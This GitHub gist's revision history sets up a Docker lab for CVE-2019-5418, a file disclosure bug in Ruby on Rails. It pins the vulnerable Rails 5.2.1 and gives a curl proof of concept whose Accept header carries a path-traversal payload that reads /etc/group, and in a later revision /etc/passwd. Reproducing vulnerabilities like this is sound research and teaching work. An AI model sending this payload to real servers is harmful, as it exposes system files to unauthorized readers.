-
-
Save nuryslyrt/92df4d510ea27214342cc7f0402877e3 to your computer and use it in GitHub Desktop.
Revisions
-
ajxchapman revised this gist
Mar 30, 2019 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -37,7 +37,7 @@ bundle exec rails s -p 3000 -b '0.0.0.0' To demonstrate vulnerability ```sh curl -i -s -k -X $'GET' \ -H $'Host: 127.0.0.1:3000' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././e*c/./p*d{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \ $'http://127.0.0.1:3000/chybeta' ``` -
Mar 30, 2019 . 1 changed file with 5 additions and 5 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -26,7 +26,7 @@ Setup docker container ```sh docker build -t rails:CVE-2019-5418 . docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash git clone https://github.com/mpgn/CVE-2019-5418.git cd CVE-2019-5418/demo/ sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile bundle install @@ -41,7 +41,7 @@ curl -i -s -k -X $'GET' \ $'http://127.0.0.1:3000/chybeta' ``` ## Sources * https://github.com/mpgn/CVE-2019-5418 * https://docs.docker.com/compose/rails/ * https://stackoverflow.com/a/52979051 -
Mar 30, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,47 @@ # CVE-2019-5418 Demo Build Docker container: `Dockerfile` ```Dockerfile FROM ruby:2.5 RUN apt-get update -qq && apt-get install -y nodejs postgresql-client RUN mkdir /myapp WORKDIR /myapp COPY Gemfile /myapp/Gemfile COPY Gemfile.lock /myapp/Gemfile.lock RUN bundle install COPY . /myapp # Add a script to be executed every time the container starts. COPY entrypoint.sh /usr/bin/ RUN chmod +x /usr/bin/entrypoint.sh ENTRYPOINT ["entrypoint.sh"] EXPOSE 3000 # Start the main process. CMD ["rails", "server", "-b", "0.0.0.0"] ``` Setup docker container ```sh docker build -t rails:CVE-2019-5418 . docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash https://github.com/mpgn/CVE-2019-5418.git cd CVE-2019-5418/demo/ sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile bundle install bundle update bundle exec rails s -p 3000 -b '0.0.0.0' ``` To demonstrate vulnerability ```sh curl -i -s -k -X $'GET' \ -H $'Host: 127.0.0.1:3000' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././etc/./group{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \ $'http://127.0.0.1:3000/chybeta' ``` ## Source https://docs.docker.com/compose/rails/ https://stackoverflow.com/a/52979051 https://stackoverflow.com/a/54529016